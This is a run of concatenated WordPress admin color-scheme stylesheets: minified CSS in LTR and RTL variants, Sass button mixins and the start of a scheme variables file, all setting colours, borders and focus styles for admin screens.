a:hover:after{background:#9ebaa0}.theme-browser .theme.add-new-theme a:focus span:after,.theme-browser .theme.add-new-theme a:hover span:after{color:#9ebaa0}.theme-filter.current,.theme-section.current{border-bottom-color:#738e96}body.more-filters-opened .more-filters{color:#fff;background-color:#738e96}body.more-filters-opened .more-filters:before{color:#fff}body.more-filters-opened .more-filters:focus,body.more-filters-opened .more-filters:hover{background-color:#9ebaa0;color:#fff}body.more-filters-opened .more-filters:focus:before,body.more-filters-opened .more-filters:hover:before{color:#fff}.widgets-chooser li.widgets-chooser-selected{background-color:#9ebaa0;color:#fff}.widgets-chooser li.widgets-chooser-selected:before,.widgets-chooser li.widgets-chooser-selected:focus:before{color:#fff}.nav-menus-php .item-edit:focus:before{box-shadow:0 0 0 1px rgb(187.8012048193,207.1987951807,189.186746988),0 0 2px 1px #9ebaa0}div#wp-responsive-toggle a:before{color:#f2fcff}.wp-responsive-open div#wp-responsive-toggle a{border-color:transparent;background:#9ebaa0}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a{background:rgb(98.2714285714,123.5412244898,131.0285714286)}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{color:#f2fcff}.mce-container.mce-menu .mce-menu-item-normal.mce-active,.mce-container.mce-menu .mce-menu-item-preview.mce-active,.mce-container.mce-menu .mce-menu-item.mce-selected,.mce-container.mce-menu .mce-menu-item:focus,.mce-container.mce-menu .mce-menu-item:hover{background:#9ebaa0}.wp-core-ui #customize-controls .control-section .accordion-section-title:focus,.wp-core-ui #customize-controls .control-section .accordion-section-title:hover,.wp-core-ui #customize-controls .control-section.open .accordion-section-title,.wp-core-ui #customize-controls .control-section:hover>.accordion-section-title{color:#0073aa;border-left-color:#9ebaa0}.wp-core-ui .customize-controls-close:focus,.wp-core-ui .customize-controls-close:hover,.wp-core-ui .customize-controls-preview-toggle:focus,.wp-core-ui .customize-controls-preview-toggle:hover{color:#0073aa;border-top-color:#9ebaa0}.wp-core-ui .customize-panel-back:focus,.wp-core-ui .customize-panel-back:hover,.wp-core-ui .customize-section-back:focus,.wp-core-ui .customize-section-back:hover{color:#0073aa;border-left-color:#9ebaa0}.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.wp-core-ui .active-menu-screen-options .customize-screen-options-toggle,.wp-core-ui .customize-screen-options-toggle:active,.wp-core-ui .customize-screen-options-toggle:focus,.wp-core-ui .customize-screen-options-toggle:hover{color:#0073aa}.wp-core-ui #available-menu-items .item-add:focus:before,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before,.wp-core-ui #customize-save-button-wrapper .save:focus,.wp-core-ui #publish-settings:focus,.wp-core-ui .customize-screen-options-toggle:focus:before,.wp-core-ui .menu-item-bar .item-delete:focus:before,.wp-core-ui.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 1px rgb(187.8012048193,207.1987951807,189.186746988),0 0 2px 1px #9ebaa0}.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover,.wp-core-ui #customize-controls .customize-info.open .customize-help-toggle{color:#0073aa}.wp-core-ui .control-panel-themes .customize-themes-section-title:focus,.wp-core-ui .control-panel-themes .customize-themes-section-title:hover{border-left-color:#9ebaa0;color:#0073aa}.wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after{background:#9ebaa0}.wp-core-ui .control-panel-themes .customize-themes-section-title.selected{color:#0073aa}.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-outer-theme-controls .control-section:hover>.accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section:hover>.accordion-section-title:after{color:#0073aa}.wp-core-ui .customize-control .attachment-media-view .button-add-media:focus{background-color:#fbfbfc;border-color:#9ebaa0;border-style:solid;box-shadow:0 0 0 1px #9ebaa0;outline:2px solid transparent}.wp-core-ui .wp-full-overlay-footer .devices button.active:hover,.wp-core-ui .wp-full-overlay-footer .devices button:focus{border-bottom-color:#9ebaa0}.wp-core-ui .wp-full-overlay-footer .devices button:focus:before,.wp-core-ui .wp-full-overlay-footer .devices button:hover:before{color:#9ebaa0}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover{color:#9ebaa0}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow{box-shadow:0 0 0 1px rgb(187.8012048193,207.1987951807,189.186746988),0 0 2px 1px #9ebaa0}.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover{border-bottom-color:#9ebaa0;color:#0073aa}/*! This file is auto-generated */ body{background:#f0f0f0}a{color:#0073aa}a:active,a:focus,a:hover{color:rgb(0,149.5,221)}#post-body #visibility:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-revisions:before,.curtime #timestamp:before,span.wp-media-buttons-icon:before{color:currentColor}.wp-core-ui .button-link,.wp-core-ui .button.button-link{color:var(--wp-admin-theme-color)}.wp-core-ui .button-link:active,.wp-core-ui .button-link:hover,.wp-core-ui .button.button-link:active,.wp-core-ui .button.button-link:hover{color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-link:focus,.wp-core-ui .button.button-link:focus{color:var(--wp-admin-theme-color);border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-link:disabled,.wp-core-ui .button-link[aria-disabled=true],.wp-core-ui .button.button-link:disabled,.wp-core-ui .button.button-link[aria-disabled=true]{color:#949494}.media-modal .delete-attachment,.media-modal .trash-attachment,.media-modal .untrash-attachment,.wp-core-ui .button-link-delete{color:#cc1818}.media-modal .delete-attachment:focus,.media-modal .delete-attachment:hover,.media-modal .trash-attachment:focus,.media-modal .trash-attachment:hover,.media-modal .untrash-attachment:focus,.media-modal .untrash-attachment:hover,.wp-core-ui .button-link-delete:focus,.wp-core-ui .button-link-delete:hover{color:rgb(230.6842105263,48.3157894737,48.3157894737)}input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}input[type=radio]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.wp-core-ui input[type=reset]:active,.wp-core-ui input[type=reset]:hover{color:rgb(0,149.5,221)}input[type=color]:focus,input[type=date]:focus,input[type=datetime-local]:focus,input[type=datetime]:focus,input[type=email]:focus,input[type=month]:focus,input[type=number]:focus,input[type=password]:focus,input[type=search]:focus,input[type=tel]:focus,input[type=text]:focus,input[type=time]:focus,input[type=url]:focus,input[type=week]:focus,select:focus,textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}input[type=checkbox]:focus,input[type=radio]:focus{border-color:#1e1e1e;box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid transparent}.wp-core-ui select:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-tags-autocomplete .ui-state-focus,.wp-tags-autocomplete [aria-selected=true]{background-color:var(--wp-admin-theme-color)}#pass1-text:focus,#pass1:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.mailserver-pass-wrap .button.wp-hide-pw:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-core-ui .button{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button.disabled,.wp-core-ui .button:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-secondary{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button-secondary:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-secondary:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-secondary:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button-secondary.disabled,.wp-core-ui .button-secondary:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary{background:var(--wp-admin-theme-color);border-color:transparent;border-radius:2px;color:#fff}.wp-core-ui .button-primary:hover{background:var(--wp-admin-theme-color-darker-10);border-color:transparent;color:#fff}.wp-core-ui .button-primary:focus{background:var(--wp-admin-theme-color);border-color:transparent;color:#fff;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid transparent}.wp-core-ui .button-primary:active{background:var(--wp-admin-theme-color-darker-20);border-color:transparent;color:#fff}.wp-core-ui .button-primary.disabled,.wp-core-ui .button-primary:disabled{background:#f0f0f0;border-color:transparent;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary.active,.wp-core-ui .button-primary.active:focus,.wp-core-ui .button-primary.active:hover{background:var(--wp-admin-theme-color-darker-10);color:#fff;border-color:transparent;box-shadow:none}.wp-core-ui .button-group>.button.active{border-color:var(--wp-admin-theme-color);background:rgba(var(--wp-admin-theme-color--rgb),.08)}.wp-core-ui .wp-ui-primary{color:#fff;background-color:#738e96}.wp-core-ui .wp-ui-text-primary{color:#738e96}.wp-core-ui .wp-ui-highlight{color:#fff;background-color:#9ebaa0}.wp-core-ui .wp-ui-text-highlight{color:#9ebaa0}.wp-core-ui .wp-ui-notification{color:#fff;background-color:#aa9d88}.wp-core-ui .wp-ui-text-notification{color:#aa9d88}.wp-core-ui .wp-ui-text-icon{color:#f2fcff}.wrap .page-title-action{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wrap .page-title-action:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wrap .page-title-action:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wrap .page-title-action:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.view-switch a.current:before{color:#738e96}.view-switch a:hover:before{color:#aa9d88}#adminmenu,#adminmenuback,#adminmenuwrap{background:#738e96}#adminmenu a{color:#fff}#adminmenu div.wp-menu-image:before{color:#f2fcff}#adminmenu a:hover,#adminmenu li.menu-top:hover,#adminmenu li.opensub>a.menu-top,#adminmenu li>a.menu-top:focus{color:#fff;background-color:#9ebaa0}#adminmenu li.menu-top:hover div.wp-menu-image:before,#adminmenu li.opensub>a.menu-top div.wp-menu-image:before{color:#fff}.about-wrap .nav-tab-active,.nav-tab-active,.nav-tab-active:hover{background-color:#f0f0f0;border-bottom-color:#f0f0f0}#adminmenu .wp-has-current-submenu .wp-submenu,#adminmenu .wp-has-current-submenu.opensub .wp-submenu,#adminmenu .wp-submenu,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu{background:rgb(98.2714285714,123.5412244898,131.0285714286)}#adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after{border-left-color:rgb(98.2714285714,123.5412244898,131.0285714286)}#adminmenu .wp-submenu .wp-submenu-head{color:rgb(213,221.1,223.5)}#adminmenu .wp-has-current-submenu .wp-submenu a,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a,#adminmenu .wp-submenu a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a{color:rgb(213,221.1,223.5)}#adminmenu .wp-has-current-submenu .wp-submenu a:focus,#adminmenu .wp-has-current-submenu .wp-submenu a:hover,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover,#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:hover{color:#9ebaa0}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a,#adminmenu .wp-submenu li.current a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a{color:#fff}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover,#adminmenu .wp-submenu li.current a:focus,#adminmenu .wp-submenu li.current a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:hover{color:#9ebaa0}ul#adminmenu a.wp-has-current-submenu:after,ul#adminmenu>li.current>a.current:after{border-left-color:#f0f0f0}#adminmenu li.current a.menu-top,#adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head,#adminmenu li.wp-has-current-submenu a.wp-has-current-submenu,.folded #adminmenu li.current.menu-top{color:#fff;background:#9ebaa0}#adminmenu a.current:hover div.wp-menu-image:before,#adminmenu li a:focus div.wp-menu-image:before,#adminmenu li.current div.wp-menu-image:before,#adminmenu li.opensub div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before,#adminmenu li:hover div.wp-menu-image:before{color:#fff}#adminmenu .awaiting-mod,#adminmenu .menu-counter,#adminmenu .update-plugins{color:#fff;background:#aa9d88}#adminmenu li a.wp-has-current-submenu .update-plugins,#adminmenu li.current a .awaiting-mod,#adminmenu li.menu-top:hover>a .update-plugins,#adminmenu li:hover a .awaiting-mod{color:#fff;background:rgb(98.2714285714,123.5412244898,131.0285714286)}#collapse-button{color:#f2fcff}#collapse-button:focus,#collapse-button:hover{color:#9ebaa0}#wpadminbar{color:#fff;background:#738e96}#wpadminbar .ab-item,#wpadminbar a.ab-item,#wpadminbar>#wp-toolbar span.ab-label,#wpadminbar>#wp-toolbar span.noticon{color:#fff}#wpadminbar .ab-icon,#wpadminbar .ab-icon:before,#wpadminbar .ab-item:after,#wpadminbar .ab-item:before{color:#f2fcff}#wpadminbar .ab-top-menu>li.menupop.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>li>.ab-item:focus,#wpadminbar.nojs .ab-top-menu>li.menupop:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li>.ab-item:focus{color:#9ebaa0;background:rgb(98.2714285714,123.5412244898,131.0285714286)}#wpadminbar:not(.mobile)>#wp-toolbar a:focus span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li.hover span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li:hover span.ab-label{color:#9ebaa0}#wpadminbar:not(.mobile) li:hover #adminbarsearch:before,#wpadminbar:not(.mobile) li:hover .ab-icon:before,#wpadminbar:not(.mobile) li:hover .ab-item:after,#wpadminbar:not(.mobile) li:hover .ab-item:before{color:#9ebaa0}#wpadminbar .menupop .ab-sub-wrapper{background:rgb(98.2714285714,123.5412244898,131.0285714286)}#wpadminbar .quicklinks .menupop ul.ab-sub-secondary,#wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu{background:rgb(142.7255,154.4890142857,157.9745)}#wpadminbar .ab-submenu .ab-item,#wpadminbar .quicklinks .menupop ul li a,#wpadminbar .quicklinks .menupop.hover ul li a,#wpadminbar.nojs .quicklinks .menupop:hover ul li a{color:rgb(213,221.1,223.5)}#wpadminbar .menupop .menupop>.ab-item:before,#wpadminbar .quicklinks li .blavatar{color:#f2fcff}#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a,#wpadminbar .quicklinks .menupop ul li a:focus,#wpadminbar .quicklinks .menupop ul li a:focus strong,#wpadminbar .quicklinks .menupop ul li a:hover,#wpadminbar .quicklinks .menupop ul li a:hover strong,#wpadminbar .quicklinks .menupop.hover ul li a:focus,#wpadminbar .quicklinks .menupop.hover ul li a:hover,#wpadminbar li #adminbarsearch.adminbar-focused:before,#wpadminbar li .ab-item:focus .ab-icon:before,#wpadminbar li .ab-item:focus:before,#wpadminbar li a:focus .ab-icon:before,#wpadminbar li.hover .ab-icon:before,#wpadminbar li.hover .ab-item:before,#wpadminbar li:hover #adminbarsearch:before,#wpadminbar li:hover .ab-icon:before,#wpadminbar li:hover .ab-item:before,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover{color:#9ebaa0}#wpadminbar .menupop .menupop>.ab-item:hover:before,#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a .blavatar,#wpadminbar .quicklinks li a:focus .blavatar,#wpadminbar .quicklinks li a:hover .blavatar,#wpadminbar.mobile .quicklinks .hover .ab-icon:before,#wpadminbar.mobile .quicklinks .hover .ab-item:before{color:#9ebaa0}#wpadminbar.mobile .quicklinks .ab-icon:before,#wpadminbar.mobile .quicklinks .ab-item:before{color:#f2fcff}#wpadminbar #adminbarsearch:before{color:#f2fcff}#wpadminbar>#wp-toolbar>#wp-admin-bar-top-secondary>#wp-admin-bar-search #adminbarsearch input.adminbar-input:focus{color:#fff;background:rgb(135.4,158.4657142857,165.3)}#wpadminbar #wp-admin-bar-recovery-mode{color:#fff;background-color:#aa9d88}#wpadminbar #wp-admin-bar-recovery-mode .ab-item,#wpadminbar #wp-admin-bar-recovery-mode a.ab-item{color:#fff}#wpadminbar .ab-top-menu>#wp-admin-bar-recovery-mode.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus{color:#fff;background-color:rgb(153,141.3,122.4)}#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar>a img{border-color:rgb(135.4,158.4657142857,165.3);background-color:rgb(135.4,158.4657142857,165.3)}#wpadminbar #wp-admin-bar-user-info .display-name{color:#fff}#wpadminbar #wp-admin-bar-user-info a:hover .display-name{color:#9ebaa0}#wpadminbar #wp-admin-bar-user-info .username{color:rgb(213,221.1,223.5)}.wp-pointer .wp-pointer-content h3{background-color:#9ebaa0;border-color:rgb(143.0993975904,175.4006024096,145.406626506)}.wp-pointer .wp-pointer-content h3:before{color:#9ebaa0}.wp-pointer.wp-pointer-top .wp-pointer-arrow,.wp-pointer.wp-pointer-top .wp-pointer-arrow-inner,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner{border-bottom-color:#9ebaa0}.media-item .bar,.media-progress-bar div{background-color:#9ebaa0}.details.attachment{box-shadow:inset 0 0 0 3px #fff,inset 0 0 0 7px #9ebaa0}.attachment.details .check{background-color:#9ebaa0;box-shadow:0 0 0 1px #fff,0 0 0 2px #9ebaa0}.media-selection .attachment.selection.details .thumbnail{box-shadow:0 0 0 1px #fff,0 0 0 3px #9ebaa0}.theme-browser .theme.active .theme-name,.theme-browser .theme.add-new-theme a:focus:after,.theme-browser .theme.add-new-theme a:hover:after{background:#9ebaa0}.theme-browser .theme.add-new-theme a:focus span:after,.theme-browser .theme.add-new-theme a:hover span:after{color:#9ebaa0}.theme-filter.current,.theme-section.current{border-bottom-color:#738e96}body.more-filters-opened .more-filters{color:#fff;background-color:#738e96}body.more-filters-opened .more-filters:before{color:#fff}body.more-filters-opened .more-filters:focus,body.more-filters-opened .more-filters:hover{background-color:#9ebaa0;color:#fff}body.more-filters-opened .more-filters:focus:before,body.more-filters-opened .more-filters:hover:before{color:#fff}.widgets-chooser li.widgets-chooser-selected{background-color:#9ebaa0;color:#fff}.widgets-chooser li.widgets-chooser-selected:before,.widgets-chooser li.widgets-chooser-selected:focus:before{color:#fff}.nav-menus-php .item-edit:focus:before{box-shadow:0 0 0 1px rgb(187.8012048193,207.1987951807,189.186746988),0 0 2px 1px #9ebaa0}div#wp-responsive-toggle a:before{color:#f2fcff}.wp-responsive-open div#wp-responsive-toggle a{border-color:transparent;background:#9ebaa0}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a{background:rgb(98.2714285714,123.5412244898,131.0285714286)}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{color:#f2fcff}.mce-container.mce-menu .mce-menu-item-normal.mce-active,.mce-container.mce-menu .mce-menu-item-preview.mce-active,.mce-container.mce-menu .mce-menu-item.mce-selected,.mce-container.mce-menu .mce-menu-item:focus,.mce-container.mce-menu .mce-menu-item:hover{background:#9ebaa0}.wp-core-ui #customize-controls .control-section .accordion-section-title:focus,.wp-core-ui #customize-controls .control-section .accordion-section-title:hover,.wp-core-ui #customize-controls .control-section.open .accordion-section-title,.wp-core-ui #customize-controls .control-section:hover>.accordion-section-title{color:#0073aa;border-right-color:#9ebaa0}.wp-core-ui .customize-controls-close:focus,.wp-core-ui .customize-controls-close:hover,.wp-core-ui .customize-controls-preview-toggle:focus,.wp-core-ui .customize-controls-preview-toggle:hover{color:#0073aa;border-top-color:#9ebaa0}.wp-core-ui .customize-panel-back:focus,.wp-core-ui .customize-panel-back:hover,.wp-core-ui .customize-section-back:focus,.wp-core-ui .customize-section-back:hover{color:#0073aa;border-right-color:#9ebaa0}.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.wp-core-ui .active-menu-screen-options .customize-screen-options-toggle,.wp-core-ui .customize-screen-options-toggle:active,.wp-core-ui .customize-screen-options-toggle:focus,.wp-core-ui .customize-screen-options-toggle:hover{color:#0073aa}.wp-core-ui #available-menu-items .item-add:focus:before,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before,.wp-core-ui #customize-save-button-wrapper .save:focus,.wp-core-ui #publish-settings:focus,.wp-core-ui .customize-screen-options-toggle:focus:before,.wp-core-ui .menu-item-bar .item-delete:focus:before,.wp-core-ui.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 1px rgb(187.8012048193,207.1987951807,189.186746988),0 0 2px 1px #9ebaa0}.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover,.wp-core-ui #customize-controls .customize-info.open .customize-help-toggle{color:#0073aa}.wp-core-ui .control-panel-themes .customize-themes-section-title:focus,.wp-core-ui .control-panel-themes .customize-themes-section-title:hover{border-right-color:#9ebaa0;color:#0073aa}.wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after{background:#9ebaa0}.wp-core-ui .control-panel-themes .customize-themes-section-title.selected{color:#0073aa}.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-outer-theme-controls .control-section:hover>.accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section:hover>.accordion-section-title:after{color:#0073aa}.wp-core-ui .customize-control .attachment-media-view .button-add-media:focus{background-color:#fbfbfc;border-color:#9ebaa0;border-style:solid;box-shadow:0 0 0 1px #9ebaa0;outline:2px solid transparent}.wp-core-ui .wp-full-overlay-footer .devices button.active:hover,.wp-core-ui .wp-full-overlay-footer .devices button:focus{border-bottom-color:#9ebaa0}.wp-core-ui .wp-full-overlay-footer .devices button:focus:before,.wp-core-ui .wp-full-overlay-footer .devices button:hover:before{color:#9ebaa0}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover{color:#9ebaa0}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow{box-shadow:0 0 0 1px rgb(187.8012048193,207.1987951807,189.186746988),0 0 2px 1px #9ebaa0}.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover{border-bottom-color:#9ebaa0;color:#0073aa}@use 'sass:color'; @use 'tokens'; /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ @mixin button( $button-text-color: #fff ) { background: var(--wp-admin-theme-color); border-color: transparent; border-radius: tokens.$radius-s; color: $button-text-color; &:hover { background: var(--wp-admin-theme-color-darker-10); border-color: transparent; color: $button-text-color; } &:focus { background: var(--wp-admin-theme-color); border-color: transparent; color: $button-text-color; /* Gutenberg-style focus ring: outer theme color + inset white for contrast */ box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color), inset 0 0 0 1px tokens.$white; /* Visible in Windows High Contrast mode */ outline: 1px solid transparent; } &:active { background: var(--wp-admin-theme-color-darker-20); border-color: transparent; color: $button-text-color; } &:disabled, &.disabled { background: tokens.$gray-100; border-color: transparent; color: tokens.$gray-600; cursor: not-allowed; } &.active, &.active:focus, &.active:hover { background: var(--wp-admin-theme-color-darker-10); color: $button-text-color; border-color: transparent; box-shadow: none; } } /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ @mixin button-secondary() { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: tokens.$radius-s; color: var(--wp-admin-theme-color); &:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } &:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } &:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } &:disabled, &.disabled { background: transparent; border-color: tokens.$gray-300; color: tokens.$gray-600; cursor: not-allowed; } } /* * Tertiary button mixin - transparent background, gray text. */ @mixin button-tertiary() { background: transparent; border: 1px solid tokens.$gray-600; border-radius: tokens.$radius-s; color: tokens.$gray-900; &:hover { background: rgba(0, 0, 0, 0.05); border-color: tokens.$gray-700; color: tokens.$gray-900; } &:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: tokens.$gray-900; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } &:active { background: rgba(0, 0, 0, 0.1); border-color: tokens.$gray-700; color: tokens.$gray-900; } &:disabled, &.disabled { background: transparent; border-color: tokens.$gray-400; color: tokens.$gray-600; cursor: not-allowed; } } @use "sass:color"; // Import design system tokens @use "tokens" as *; // assign default value to all undefined variables $scheme-name: "default" !default; // core variables $text-color: #fff !default; $base-color: #23282d !default; $icon-color: 